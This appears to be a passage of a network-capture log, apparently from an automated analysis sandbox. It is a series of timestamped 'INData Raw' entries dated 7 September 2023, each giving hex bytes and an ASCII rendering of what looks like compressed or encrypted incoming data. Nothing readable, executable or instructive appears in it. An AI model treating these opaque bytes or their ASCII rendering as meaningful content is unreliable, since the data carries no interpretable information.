                                                                                                                      2023-09-07 16:19:24 UTC992INData Raw: ed d5 2c d8 ca 17 24 47 3d ab ea 51 e4 6f 0d 2d 05 5d 67 3d a5 b2 d5 e8 9b ac 90 1c b4 31 72 d7 c6 9e 42 9f 65 b8 8b a3 c0 c2 4e 37 f3 5a a1 0c 6e 72 3f 26 3c 25 7b d2 5d 42 a2 3d e9 e5 b5 66 74 68 c1 cd 2e 85 72 50 39 34 f4 6d 96 26 45 50 f3 8d 2c 1e 9f 4e d1 a9 55 33 6e 1c a3 3f 23 bc 59 18 9e 9a 47 9e e3 13 13 4c c1 9d ff 7b 3c 01 a3 12 2c 5b 87 d1 79 13 ea 56 bf 09 03 63 d9 3a 12 df dd f0 da 82 e3 d8 01 10 91 e4 22 ac 6b 77 68 66 38 ba 2c 78 7b 38 5a 10 bc d5 eb 71 fa e4 c8 64 08 f7 2f bd 13 ed 48 91 63 fd c0 30 aa 4c 96 29 02 ab 74 29 b9 cb 61 a0 a8 04 3c 48 d9 35 61 2a 1a b4 0c 25 56 b4 0b 72 f6 d4 85 a3 e9 a1 dc c8 6e cd f6 8b 0b ed 81 3d e4 e6 ce 95 7a be 13 8e e6 85 be 17 d9 cd 45 f3 44 67 ee 30 47 76 07 33 34 c7 a4 3d 65 ea c8 29 d8 5c aa 47 9a
                                                                                                                      Data Ascii: ,$G=Qo-]g=1rBeN7Znr?&<%{]B=fth.rP94m&EP,NU3n?#YGL{<,[yVc:"kwhf8,x{8Zqd/Hc0L)t)a<H5a*%Vrn=zEDg0Gv34=e)\G
                                                                                                                      2023-09-07 16:19:24 UTC1000INData Raw: ce 49 0a 9b 39 52 5d ae 54 97 27 95 e7 4b 75 53 a4 ba bb a5 ba fb a5 ba 05 52 9d 5f aa 5b 24 d5 2d 96 ea 82 52 5d 8d 54 b7 54 da 8e b8 2b 6d 3f 4a df 88 ed 6c 35 fa 92 08 ff 06 2f 29 b7 84 3f 3e 17 de 6d 0c 88 12 05 4a db f7 d2 34 f0 e3 55 b6 a7 e2 c9 de 0a 7f f2 aa b4 fd 38 a6 a8 9b 27 6d df 45 b6 3a 3b 31 fa 9d 09 f3 db 57 1c 42 18 20 27 45 b6 3c ff 0c 7f ed 2b 8e f1 20 41 a2 62 da ca ef 33 c4 d5 43 75 f9 f6 d5 74 05 53 94 ca 9d ed 69 eb 9b d0 2a 6b 41 0d fd 4c 70 d2 cf c4 43 6b f1 a7 68 3d fd 4c 5e 45 3f 25 8b e9 a7 ec 3e fa 99 59 42 3f 15 bd 3f c3 9f d9 77 c3 cf 10 22 f2 a1 f4 b7 9c ca c2 fd aa 3a e8 3e 7c a4 3f 78 03 6e f0 49 c0 59 7f 9b 10 cc 67 3b 01 ff 88 09 09 66 95 0c 0f 8e 76 aa ef 01 6b f8 85 57 7d 0f 97 c1 d0 11 4d 3d 02 de 51 02 a8 75 90 b5
                                                                                                                      Data Ascii: I9R]T'KuSR_[$-R]TT+m?Jl5/)?>mJ4U8'mE:;1WB 'E<+ Ab3CutSi*kALpCkh=L^E?%>YB??w":>|?xnIYg;fvkW}M=Qu
                                                                                                                      2023-09-07 16:19:24 UTC1008INData Raw: 82 cd 33 48 63 4b 7f 89 9c 99 70 04 bb d8 0c d1 96 46 ba 3d 5e 9f d4 22 c7 b1 c8 20 c2 c5 29 31 e3 31 34 7d 35 8f 8a 33 09 d3 e9 97 5b a7 b1 43 d0 e1 87 8f 54 64 19 c0 6c fd 84 25 fa 05 c7 f4 46 25 99 a8 22 23 d2 95 11 be 21 52 b9 d0 f0 16 cc cf 70 52 ee ae 26 13 95 ce 76 59 aa df 84 23 5e c5 c6 fa 9f 70 f0 1f e9 b2 84 6f 01 f3 2d 7b 16 d8 5b 5a e0 1a 5b 16 a4 e3 43 2d e0 7c 29 cb 20 98 42 8f c5 97 49 0e 5f 41 66 a0 58 9c 05 86 94 c9 4a 89 31 fb 24 a9 7d 4f a4 eb ea f0 50 d2 45 d1 99 e5 f6 7b 5c b1 0a 8b bf 26 c9 7f 82 00 e6 57 c6 1a 4c 8d a5 db 8f 92 74 31 d2 c5 87 2f 63 c6 3e 9f b1 75 a1 dd 04 7d 7b 52 3e bf b0 54 af 02 61 61 b5 e1 02 84 06 1e 60 79 a2 02 fc 30 7d 6e b5 bc b9 0b 2e 62 47 3e 37 09 ce cc b0 0d 15 2d 84 0e cf 05 d9 b5 a9 1e 5b 2d db 5b 44
                                                                                                                      Data Ascii: 3HcKpF=^" )114}53[CTdl%F%"#!RpR&vY#^po-{[Z[C-|) BI_AfXJ1$}OPE{\&WLt1/c>u}{R>Taa`y0}n.bG>7-[-[D
                                                                                                                      2023-09-07 16:19:24 UTC1015INData Raw: d5 13 61 7d 7f d7 0d f6 ce 9c 66 a3 b3 ab 7d 20 b2 63 a3 bd ab 3d 85 a4 dd e0 ec 04 09 10 ee 22 3a 69 08 ed f0 a9 a0 35 07 e6 60 47 ce 37 34 86 9f 7a 4b 95 ae f6 b3 f1 c3 25 71 6b fd 1e 8d 7c 07 fd 67 71 45 b8 c0 4c 18 0d e9 00 30 1b ce 54 47 3a 12 f0 ca f2 d9 81 44 f1 77 81 75 4f e5 7d 7e c5 67 36 48 7d 6e 0e 2d 35 a3 5b c9 fb 60 46 ce 39 7f ce 5e b7 c7 a7 42 a4 0d 90 c7 ca d3 e5 d8 4f 71 a9 d4 a2 e0 d3 47 f0 e9 f7 28 c8 2c d3 14 d5 94 a7 0e 0b 96 25 d7 c2 97 b0 7c b5 91 f9 37 d2 c3 a7 82 d7 19 04 3f a3 6d e4 27 fd 51 4e aa 8d f5 2a 7e bc 69 30 b4 12 33 1c 56 b9 c8 d8 ca 02 30 44 79 70 a3 2e f6 00 7e e1 fd a8 95 c1 0b 34 e1 d5 80 4e c7 57 25 85 22 78 03 c2 a5 fa 46 09 7f 8e 6e 07 cc 04 b9 58 f0 73 37 dc 31 3f 84 ec 6d 40 08 c5 c7 82 1c 0d af 7f 54 4e f2
                                                                                                                      Data Ascii: a}f} c=":i5`G74zK%qk|gqEL0TG:DwuO}~g6H}n-5[`F9^BOqG(,%|7?m'QN*~i03V0Dyp.~4NW%"xFnXs71?m@TN
                                                                                                                      2023-09-07 16:19:24 UTC1023INData Raw: aa 1d 0f be 17 0f a0 1d ec 28 0c 96 27 b9 a1 f0 63 60 1f e2 c8 23 44 4a 56 32 dc f2 ad b2 1e 82 a8 e6 52 83 6b 02 6f de d0 2c 49 3d af fc 0d 82 2b 7f a4 88 c7 25 df fa 73 8c 43 e3 47 de 46 4b 99 a8 0b 92 c9 ea af 80 f2 cb d9 e9 c6 2b ae 61 5b 33 c7 2c a6 0b 59 2c 3f ef 6d 72 cc 32 50 e7 a4 73 d8 d7 5c fa 25 5b 37 6f ef e0 f5 a3 11 93 13 e3 e7 37 4c ef 96 7f c8 ae 72 20 2a 6d ee 11 ba 22 09 2b 60 1e 0b 45 cb 90 33 53 a0 93 19 15 67 89 2b 80 07 7b 5d 4d 29 dd 44 52 10 4a 43 42 69 b9 f0 24 4c 7b 81 b2 00 7c c7 0f e8 3e 6a be f0 22 30 25 e1 45 98 56 4d 2b 60 92 43 9d ec 9c 8a d9 a7 b1 ab 56 71 f7 99 42 ac 62 d6 55 74 b5 dc f5 72 f6 fc a8 fc bc b7 f4 f8 2d 17 d8 21 b0 be 3f 10 bf e6 0d 4d fc 9a 7b ae ee 23 7e 0d 6c a7 a6 c0 9e 7a 91 0b af 5d 26 bb 96 0a cf f7
                                                                                                                      Data Ascii: ('c`#DJV2Rko,I=+%sCGFK+a[3,Y,?mr2Ps\%[7o7Lr *m"+`E3Sg+{]M)DRJCBi$L{|>j"0%EVM+`CVqBbUtr-!?M{#~lz]&
                                                                                                                      2023-09-07 16:19:24 UTC1031INData Raw: fc b4 06 a8 34 fc 97 cf 15 a0 08 c6 f1 1b 87 fb 00 0a 46 6f 0d cb 80 28 55 b8 98 2f 37 3d 5c 57 33 de 44 2a ef 6f 6b 08 5d 2e bb 7b 43 fb 09 d3 5c f1 96 81 fa 2e 5c 0c 42 f9 e5 62 74 0d f5 f9 d6 ec f6 e1 55 db 58 ca 1b 1b 2f 30 a3 c6 fe e4 45 fe f8 d6 ca 61 e9 0f 0f 44 83 76 92 6f 61 ed c6 0b cc b3 23 7c c3 9b 97 db c8 47 fe f8 53 e4 73 51 72 2d 3c b8 f0 50 22 7f 5f 47 23 38 46 c1 fd 9f 0c 27 36 91 d7 f5 6d d6 fe f4 a5 cb 87 df 1d 45 88 bf 9b 94 88 ec b4 e6 8f b7 3e 46 6b 80 67 cb 36 9e 80 b3 7e 14 45 25 b8 69 66 98 c3 ed 5f c3 b1 e6 3a 97 8f f4 cb 8c ff 94 43 26 09 f5 37 88 d6 3e 77 81 f6 97 64 77 23 da 57 0f 8d d9 37 f4 ac 24 e5 57 6c 06 b4 ad f3 e0 92 56 19 6d 0c 5f 9b 19 be 36 d5 94 ac 63 de b5 c6 b3 74 79 ca ad 87 5c c2 fa e7 e8 e7 3a 4d 5c dc e4 b6
                                                                                                                      Data Ascii: 4Fo(U/7=\W3D*ok].{C\.\BbtUX/0EaDvoa#|GSsQr-<P"_G#8F'6mE>Fkg6~E%if_:C&7>wdw#W7$WlVm_6cty\:M\
                                                                                                                      2023-09-07 16:19:24 UTC1039INData Raw: 38 f0 72 62 c5 b7 e9 d8 5f 29 be 4d ed d8 45 c8 98 fa 36 5d f6 a2 3e be ca c4 6e e4 32 47 ea bb 83 e9 d2 01 75 7f 3c 6b 41 62 79 33 5e 78 03 8b 94 9d b9 47 e0 20 7d 27 11 3d 84 92 3d f8 7c 2d b5 6a c4 b9 e3 41 e5 80 ec 3b 23 75 e7 22 5d 03 2c 4f 7c 0d 57 12 de ac c9 14 06 a4 4b 23 c4 ee 9a 01 e9 42 49 4b 9c 0e b0 85 9a 44 d3 63 f9 7f 7c 06 da a0 16 34 04 5d 46 aa a3 36 34 10 36 12 84 88 ae ef be 91 8e bf 44 d7 19 6d 69 28 a9 28 82 a3 1f 92 d2 7e 1e 5d 26 ce 80 98 f6 90 c6 ca be 4b ca b6 ff c4 87 e7 1d 22 fb 00 77 c2 0a 68 48 94 9d 47 58 05 1e 3e be 86 47 a0 86 eb 7c f8 9a 43 e0 c9 83 27 d8 23 39 da 2d 3e ec 9e 9f 6c a0 2f 38 5a 84 93 0e 24 9a dd e6 35 ca ec 5e 3d 9e e0 60 31 f9 b7 8b fc ab 24 ff 6a c9 bf ee 27 06 a4 7f 4a be 0d 29 c6 94 94 24 53 0a 97 42
                                                                                                                      Data Ascii: 8rb_)ME6]>n2Gu<kAby3^xG }'==|-jA;#u"],O|WK#BIKDc|4]F646Dmi((~]&K"whHGX>G|C'#9->l/8Z$5^=`1$j'J)$SB
                                                                                                                      2023-09-07 16:19:24 UTC1047INData Raw: c2 c9 42 39 d7 de 3f 7f 58 98 13 26 b4 9b 40 21 4f de 67 86 af ac 7a 8c d6 d0 d8 6e f6 e3 53 25 a7 25 52 02 90 ec e6 84 24 b2 ac 09 ce 53 f9 f7 f2 e1 72 9a 2b 15 35 92 25 ac fd 01 3f ee df 45 f7 e8 30 9c e4 c5 0f c9 b2 87 fa 0b bc 6d 12 1f e6 50 67 fb 50 0a c1 42 06 81 30 01 4d e3 85 42 1e 79 61 59 05 78 a6 72 f9 f7 02 3c 13 b9 f6 81 68 1a 97 7f 05 01 c9 48 40 9a 48 f2 90 e5 99 5b e9 1d b5 b2 70 54 8d 6b 54 cd b4 51 c8 de 45 8a fc d5 98 37 6b 94 25 7a 0e 46 cc cd d9 1e 21 53 bb 9d fc ce 2b 23 2f bf 80 97 29 b6 ae f0 fd 64 ba 54 95 8f 32 84 2f af 99 35 ca d7 e8 18 65 c0 93 01 4c 07 f8 a3 02 3c 85 43 c8 9a f7 c3 51 64 37 e2 e2 c9 77 e8 47 ec 3b 3c 08 59 6b 7e 38 ca d5 58 40 4a fc e5 8c 52 62 a5 8f 82 50 3a 0a 15 f0 3e 52 23 3e 43 92 da 43 b4 85 cb d4 16 1e
                                                                                                                      Data Ascii: B9?X&@!OgznS%%R$Sr+5%?E0mPgPB0MByaYxr<hH@H[pTkTQE7k%zF!S+#/)dT2/5eL<CQd7wG;<Yk~8X@JRbP:>R#>CC
                                                                                                                      2023-09-07 16:19:24 UTC1054INData Raw: e9 6c 72 1a e3 a0 91 b6 21 09 29 eb 83 cf 4f 4e 01 bf 71 02 8f 45 be 6a 20 99 8e 96 95 77 e2 a3 3a 6a a4 de 2a 5b be 07 9c ea 9a e4 44 af c5 de 52 7e 38 e6 f6 41 d7 5e 83 ae 57 73 be 5a 67 49 45 44 cf 59 0d 11 93 34 44 6c 05 11 1d b0 f0 08 e3 12 33 a0 eb 37 41 d7 4f ab 5d 17 b0 eb d0 d1 84 8f 13 c7 84 fa 42 bc e6 0a ec 79 b9 9b 96 66 5e d2 6d 28 68 31 2e 4d 2e 9a 92 c0 fa 6b 51 fb 5b c4 fa 6b 55 fb 9b 8f 8f 89 fe 1a fb 1d b1 d5 d3 92 d3 bc d6 72 7b 8b 1b d1 85 56 9e f9 03 bc c3 16 5c 6a 80 86 cc 8e 56 8d 72 8a b1 c3 2e 2b 4e d6 0e c7 61 6d b2 9e 3c 03 93 75 9f d0 f0 36 ea 87 73 cd 49 0e 65 fb e1 0b 29 b5 39 de 5d 75 15 c3 ce 0d 2b d0 9f 4c 68 f8 51 62 a2 de 04 30 4c 07 1c f5 21 8e fa 99 1b d8 d2 b8 33 99 25 69 a6 5a 2e 9d a9 47 cb 8d ad 46 a7 d5 78 00 08
                                                                                                                      Data Ascii: lr!)ONqEj w:j*[DR~8A^WsZgIEDY4Dl37AO]Byf^m(h1.M.kQ[kUr{V\jVr.+Nam<u6sIe)9]u+LhQb0L!3%iZ.GFx
                                                                                                                      2023-09-07 16:19:24 UTC1062INData Raw: 84 98 26 df ab ef 99 10 7a 07 9d 07 0c 75 23 42 31 c3 3a dc 26 4b 6b 32 0d db cc 28 78 89 16 99 1e 47 2b d3 7e 76 df df 34 52 32 e3 fc 9f 27 1d d9 f0 b1 f5 fc 07 93 f6 6d f8 c8 60 38 4c 4a 72 f8 b3 19 9f d5 74 93 e1 70 28 1f 77 49 85 ad cd 86 0e 3c 8e 60 33 6b 55 e7 08 bb ee 33 61 6b 16 2b 26 f9 e0 bd 3c 8d 7d d1 72 b1 2c e9 98 94 9a 2b 23 25 57 72 cf 32 9a 10 f7 df a0 6f a5 39 50 47 e3 7d 96 44 cd 45 39 e8 8a 05 f5 04 af 6e 2c b4 25 e7 6c bc 6f 5c 0a 0c a5 08 46 e8 89 19 ba 20 8e a5 87 94 cd 04 52 ed 62 71 a7 2d 30 c4 d1 a2 5c b6 dc 14 99 9c 88 31 76 6b 6d e9 cc 50 b7 b9 e5 23 cb c6 16 9d 19 68 e3 39 84 ae 2e 97 83 ee d8 b3 6e 7c 28 96 5e 67 22 ad 3d 42 de 11 78 14 b6 ee 91 e7 1b 30 24 76 4b 57 fa a8 f6 50 fd 72 5d d0 18 da 97 db 14 b6 ce 37 9f ff c8 be
                                                                                                                      Data Ascii: &zu#B1:&Kk2(xG+~v4R2'm`8LJrtp(wI<`3kU3ak+&<}r,+#%Wr2o9PG}DE9n,%lo\F Rbq-0\1vkmP#h9.n|(^g"=Bx0$vKWPr]7
                                                                                                                      2023-09-07 16:19:24 UTC1070INData Raw: da ef 3c c9 b9 d3 e1 dc 21 3c 35 89 b1 cd 0d d7 b6 49 2c 7c 90 c3 b9 49 68 48 67 e7 6f 45 23 a9 dc 01 a0 12 76 a8 5c 36 fd 80 75 45 72 6e 63 00 c9 b6 51 47 bb 1c de ed ab ae 91 83 de 13 5c 3e 10 76 df 6d 8f 86 9b eb 2d f3 e7 85 da 0c c6 66 f8 bc b2 87 88 0d ac 00 89 1d fd bb be ee 65 18 81 02 a7 59 1c bd b1 ee 65 c4 be 10 6a c3 6f ac 6d e2 7d 85 8c 89 58 9e 24 ae 57 48 56 a3 6b 47 64 d1 93 7a 4c 1b 49 bc db ec 87 5b 2e 00 09 2e de 68 80 6e 4a ce 4d dd df 06 ae d0 d8 7e d3 81 bc 23 80 eb c2 88 eb 0d 44 7c f8 5c b0 0a 32 f7 8c e0 f0 00 3a 80 81 4e 22 ae 0d d7 1e 72 b8 36 05 ad c4 b9 83 35 92 77 1c ba 0f 63 aa 0d 47 93 64 79 13 88 24 81 e9 51 4c bf 8a a3 7b 04 7c bc f6 94 b1 4f fc 5f c4 fb 32 10 9a 6c 61 03 a5 37 63 85 5b 91 75 48 e8 00 e4 1a a8 66 77 d7 ff
                                                                                                                      Data Ascii: <!<5I,|IhHgoE#v\6uErncQG\>vm-feYejom}X$WHVkGdzLI[..hnJM~#D|\2:N"r65wcGdy$QL{|O_2la7c[uHfw
                                                                                                                      2023-09-07 16:19:24 UTC1078INData Raw: 94 80 84 33 8f ad 13 b0 06 89 13 c9 48 f9 3e 1d 0a 84 69 20 55 f6 98 48 8c e8 d8 1a d2 eb a8 37 01 ca 0d 8e 62 cb aa 59 90 09 fd 1a 63 e5 71 8b 21 9d 08 d3 c2 ed 67 16 fc 43 d4 f2 15 0b 89 51 1d 6a b6 6a 24 5b 6c ad 4e 28 05 7c bf 19 1a af cd 8e 16 b1 55 85 de 77 1b c3 01 f4 fc 66 14 bb 58 c8 fe 42 13 fb 6b 26 a5 e6 1d fa c8 3c e6 4f 32 7f 1c 5e 1d 95 9e 34 17 06 60 2e f4 69 60 ac ab 8a cf 87 3e 98 0f 7d 6c 3e bc f3 ad 4b e7 83 87 7b 17 90 7e 10 1d e6 20 d8 50 91 bc c6 e4 01 e8 07 47 a7 83 46 e1 f0 9b c5 ab 41 d1 e8 bb 05 05 31 b5 63 ad 18 45 3d 9f 2d 81 bc f9 ea aa 59 cd 4b 53 95 1d cd fe 38 0f b0 3b 53 72 0d c0 24 af c3 c6 fc 89 f3 f6 a8 0d ba cc 74 6b a2 ea 03 34 c0 aa 66 ab fd 9c 4b 57 fb 1b 92 56 fb c9 da 6a 6f bd 74 9d c7 d8 7a 8f 9b c5 97 c8 bd e6
                                                                                                                      Data Ascii: 3H>i UH7bYcq!gCQjj$[lN(|UwfXBk&<O2^4`.i`>}l>K{~ PGFA1cE=-YKS8;Sr$tk4fKWVjotz
                                                                                                                      2023-09-07 16:19:24 UTC1086INData Raw: 75 6e 7a 9a f9 ed 9a 7c 24 c6 e1 40 39 8b ed a7 7b 78 cc 29 54 ff 19 92 fd ea 50 b3 5e 4f 0d f8 f4 da aa 72 0c 57 95 c9 cf f1 55 45 dd c4 02 60 1f 61 f1 e1 40 e7 c7 c9 ac e2 19 da 1f 8b 9c 8e 37 55 a5 e5 e6 a1 6e 2c b8 22 f3 d5 8f 74 fa f8 fa 07 53 b2 56 e7 f7 d4 9a 10 60 37 e3 12 e1 e3 c1 91 b5 ba 0a 35 a7 4f c3 17 ce 6a b5 5a e8 c2 d2 4b e7 6b a8 37 88 54 28 a6 e7 35 f3 61 f6 e7 29 52 dd 31 7a 0a b7 9a 2a cd 7e 37 f0 dd 76 fa cf cc 7b 04 7a e2 93 c4 b7 78 87 25 e7 5e 3c ce b6 49 72 6e 96 9c 5b 24 e7 f3 92 f3 05 c9 f9 b2 ec dc e4 ae cd ae d0 78 52 2e a9 dc 4c e0 73 e5 36 c9 b9 1d f4 80 71 78 61 6f 1f e9 b0 7b 2c f6 79 26 c9 db 41 3c e6 1e 33 ee 63 d6 75 90 a3 c4 65 c3 13 70 de 83 90 73 92 b0 eb 3e 43 04 9d 76 6d f0 a4 8f b8 be 66 4f 23 22 ae 41 e2 ca 4e
                                                                                                                      Data Ascii: unz|$@9{x)TP^OrWUE`a@7Un,"tSV`75OjZKk7T(5a)R1z*~7v{zx%^<Irn[$xR.Ls6qxao{,y&A<3cueps>CvmfO#"AN
                                                                                                                      2023-09-07 16:19:24 UTC1094INData Raw: 44 3a dd 74 fc 47 7a f4 f0 97 8d 61 f7 c9 79 a8 e2 e0 6d 44 2e 47 f4 94 ea 89 54 8e 58 6a 57 2b 7c 7a 42 51 a1 6d d0 64 e5 c5 4d 16 72 c7 f1 fd cf e3 23 b9 1f 1e 0b d2 4a 1c a7 13 20 6a e4 88 ee 0f df cc c6 cc ca a7 ab 79 fd 70 9c ee 29 1e ce f1 bc 50 96 b9 d4 d9 f0 e8 a1 d0 09 e3 6c 49 2c 2c 29 56 58 ff de fa 8d f9 ab d9 44 4e 72 42 ce 20 39 95 0c de e0 75 1b 1a c6 fd a5 87 3f 57 16 36 d6 5c 37 01 bf 38 9b fc 01 43 cd 5f f3 5f 04 2e 93 cd 1b 3c 8c 03 a8 15 4a ac e7 8a 5c ce b0 cd 54 16 0f 72 a4 cd e9 81 75 7e b0 99 d7 89 8d 6c 28 3f 8a bd 7e b7 3c 17 43 fd f5 5b 09 0f 35 0d cd 98 0d 61 f7 e4 46 96 5a a5 b0 3d 42 e8 37 3f c7 f3 9b 76 8b fb c9 03 07 fa 3b 4f 38 b2 85 db 5b 87 fa 86 44 56 4f 56 43 c3 2b 40 b6 79 ec 85 29 b8 5a 72 d4 c2 02 c9 2b ce 61 63 33
                                                                                                                      Data Ascii: D:tGzaymD.GTXjW+|zBQmdMr#J jyp)PlI,,)VXDNrB 9u?W6\78C__.<J\Tru~l(?~<C[5aFZ=B7?v;O8[DVOVC+@y)Zr+ac3
                                                                                                                      2023-09-07 16:19:24 UTC1101INData Raw: c3 0b 48 09 24 52 89 7c 60 85 69 96 44 2a d1 b5 ba bf 7d 7d e1 af af a0 11 0c fa 3a 71 3f 29 e9 6f 7f 4e 20 a5 41 62 5f 49 49 0b 32 ba 45 50 d2 9c 6c 55 cb b7 d2 c4 f3 7d fb 14 df c0 af 9c f8 23 bc bd 01 6c d8 34 e9 a7 3c c1 81 62 d2 43 0f 70 d2 ca e7 d6 ee fd 2d c6 a6 83 7f c4 c6 e6 3b 64 16 e4 0b 77 db bb 31 36 f7 c6 37 94 53 22 e7 57 7b e7 74 52 4e 6f af 9c f9 c8 79 7b 7c 54 4f 31 d7 d6 5e 43 da 71 25 e5 7d d5 d4 fd 31 d7 12 c6 bb e8 d9 84 f5 d8 7d 75 7d b3 e5 d5 b6 e7 ad a4 01 f7 ab 22 f3 72 a5 ea 7a d8 ff bc 5e 5c ae 54 3b d9 3c fb de e8 25 5c e2 e7 77 aa f7 4b da 93 ed 1c 12 3a 42 d5 7e d5 b5 45 5e 94 08 ad 76 b5 7c 0b c7 47 ba 71 ad f9 b3 25 17 75 f1 6a ec fb da 7d f2 45 bd a6 40 0a 8d 84 c7 42 b5 62 8b 37 e0 73 cb 53 51 d7 13 67 49 59 b6 2d 9b 93
                                                                                                                      Data Ascii: H$R|`iD*}}:q?)oN Ab_II2EPlU}#l4<bCp-;dw167S"W{tRNoy{|TO1^Cq%}1}u}"rz^\T;<%\wK:B~E^v|Gq%uj}E@Bb7sSQgIY-
                                                                                                                      2023-09-07 16:19:24 UTC1109INData Raw: 50 ba f6 93 b7 48 a3 df 1a a9 cc ee e1 18 9a 32 3f 93 ac c9 8f 2e 6a 0e 8d 2a 86 8c e2 63 19 29 bc cd 7a 73 e9 e8 9b a1 24 5a 9a d3 96 ac 94 8e 8e 5c b2 86 d2 23 97 2c 21 9b 5e 3a 81 95 4e 80 a6 89 52 9a bb 1a 5e 65 4a 9d b0 19 3e 3a cf f0 5f 6e 38 8e 2e 7e 33 15 62 fa a6 79 a9 e9 cb 75 1c a3 55 07 23 d5 9c 06 1a c5 d3 0d 97 8f 59 63 0e 89 f9 b8 6b 1b 3e a1 e1 20 b6 5f 2f 7a d7 dd d7 bf 02 50 36 55 dd 42 ac a9 32 b5 7e ab 50 9c 8a 5b bd cb 88 39 b7 ba fc 3d f3 c6 1c 89 7c 2a 89 8e b9 3d ea fa 6e 12 0f c3 17 98 5e 5a ee 23 74 e9 08 5b 8d bb 85 99 27 76 b4 f7 bd 42 22 a1 fb f3 ef 89 52 63 fe c3 56 af 4d 26 9b 8c 68 85 66 3b a3 eb 09 f6 1c 23 ed a3 e3 8d a7 fb 41 c3 e3 4b fe fe 62 98 59 70 ac db 05 a7 78 f7 47 3e b6 47 76 59 95 72 2d 72 29 39 fc 6d 8a aa 5a
                                                                                                                      Data Ascii: PH2?.j*c)zs$Z\#,!^:NR^eJ>:_n8.~3byuU#Yck> _/zP6UB2~P[9=|*=n^Z#t['vB"RcVM&hf;#AKbYpxG>GvYr-r)9mZ
                                                                                                                      2023-09-07 16:19:24 UTC1117INData Raw: dd 92 a3 f6 8d 04 b1 9c 6c c9 b1 ea e7 09 96 23 a2 60 98 a9 74 1d a1 ed 0e 9f d1 13 d4 e8 ec 45 86 e4 b8 69 3a 22 d2 f9 39 d4 80 7c 31 eb 7c e7 ee 34 15 ed 64 1e c5 33 25 07 53 59 ab d6 f6 2d 41 e8 37 85 86 47 8f 87 e1 49 6d 44 88 3c a9 3d fd 71 37 79 52 1b 64 54 f8 b5 10 87 75 ea 07 a3 fb 13 d3 e3 66 53 6c 4c 79 fb f7 92 b5 58 49 dc a4 6b 7f 9e 86 eb b5 d0 93 d0 7d 4b d0 ec 82 cd f1 1f ce 85 07 17 61 e8 64 89 6e da 36 ea a3 e6 55 d3 88 a8 a9 a1 7c f6 be 48 c5 f4 ff 50 9f 3a 9c 66 b4 84 91 bd 5d a3 8e 80 47 6e c2 96 f4 f3 2a e2 3e 04 93 55 c8 b1 70 74 75 c7 67 23 12 cd 7c 05 7e f0 99 ce 3b 13 b2 b2 e6 b6 74 f9 1b f0 21 bb e8 51 22 a5 dc a6 8a 76 ed 2f 3f d3 c5 ea 04 09 63 14 af dd b5 9e 32 3a 6a ff ab 97 70 55 55 79 e4 cd a9 24 52 31 2d f2 66 09 69 b1 14
                                                                                                                      Data Ascii: l#`tEi:"9|1|4d3%SY-A7GImD<=q7yRdTufSlLyXIk}Kadn6U|HP:f]Gn*>Uptug#|~;t!Q"v/?c2:jpUUy$R1-fi
                                                                                                                      2023-09-07 16:19:24 UTC1125INData Raw: f7 6a 2a d4 14 a0 64 8b 28 d9 d8 2f ec 86 d2 8b d0 26 61 cf a2 30 2f 7b 1e 39 dd 1e af 6c 47 8e f7 ef b5 4a 09 8a 3d 42 a5 e6 90 50 87 61 cf 52 be e7 91 cf cd a8 72 8e 2a 8a 7c 2f dc 6b 35 4a e4 59 3c 31 95 9a 2c 91 da 2b b0 0f e5 25 7c b4 3d 69 e2 17 27 b0 7f cc bb f7 ff 3f 1a 35 34 56 31 5d 99 b5 86 ae 0c 6e e0 2f 79 a1 51 b3 ee 0a 8d 9a 05 cd 14 28 c1 0c b7 31 60 e6 1e ed 90 1c ea f7 20 bf 32 e6 3b 24 83 fe 75 4b 2f 66 65 eb 2f 4c a1 a4 07 7f 27 a6 fd 5e e0 2f 71 cb 6b ab 7e 40 75 eb 59 dd 05 24 95 38 ef 14 e4 f0 e5 16 3e 00 f9 ba c1 87 c4 49 36 45 6e e2 41 fe 98 4d 6c 2b 87 d9 2e 83 aa e2 5d 1d 76 be 59 77 48 52 78 f0 f2 bf 02 75 48 3e ce ec 7f 56 ca bb 18 27 88 f6 c7 9d 69 be 05 11 42 47 fd 2e b5 a2 b5 d9 d5 61 bd f6 3a 49 9d 77 8e 63 c2 36 1c 00 15
                                                                                                                      Data Ascii: j*d(/&a0/{9lGJ=BPaRr*|/k5JY<1,+%|=i'?54V1]n/yQ(1` 2;$uK/fe/L'^/qk~@uY$8>I6EnAMl+.]vYwHRxuH>V'iBG.a:Iwc6
                                                                                                                      2023-09-07 16:19:24 UTC1133INData Raw: d3 b3 9c 28 aa 1d 29 fe 9a 46 03 fb 1f a2 0d db d2 fa 2c c6 87 4d 7c a1 d4 19 69 9a 1c e1 14 79 26 ac 0f 93 22 49 82 1a 09 8d 44 f1 95 eb f2 e6 84 71 b8 c6 1c 87 a1 7c bf ba ea 50 3c 7f 05 12 31 7e 77 e2 18 0c 4d eb 6f 3b ea 6f 7d 42 1e ac 02 57 2b a3 01 60 c7 53 ad 40 26 04 e1 93 cd 86 a5 08 99 25 37 bb d7 19 b4 40 3d 49 b8 e3 1b 96 df e4 ee 13 66 96 17 69 cf e6 05 40 5b 7a bf 52 dd cd 77 31 52 88 ee 50 ca bb 8a 9a 1d b5 67 21 bc 52 58 e0 a8 fd 07 e1 69 aa ab c3 0d c7 a0 10 36 08 ea 40 12 83 49 c1 e4 80 b6 e3 91 34 49 71 69 45 cd a1 41 c5 48 29 5c 8c b2 70 77 d1 79 47 ad 42 56 2d ce f1 f9 5d c2 89 f3 c5 6c 66 6e 74 7f 68 32 50 20 bd 92 39 2b 8b 32 c2 d7 54 46 0f 85 b2 2a 99 3b a9 b2 c8 93 14 76 44 9a 60 f6 86 07 86 ff 94 a8 7d 3e 70 7a 64 6f a8 e8 d2 23
                                                                                                                      Data Ascii: ()F,M|iy&"IDq|P<1~wMo;o}BW+`S@&%7@=Ifi@[zRw1RPg!RXi6@I4IqiEAH)\pwyGBV-]lfnth2P 9+2TF*;vD`}>pzdo#
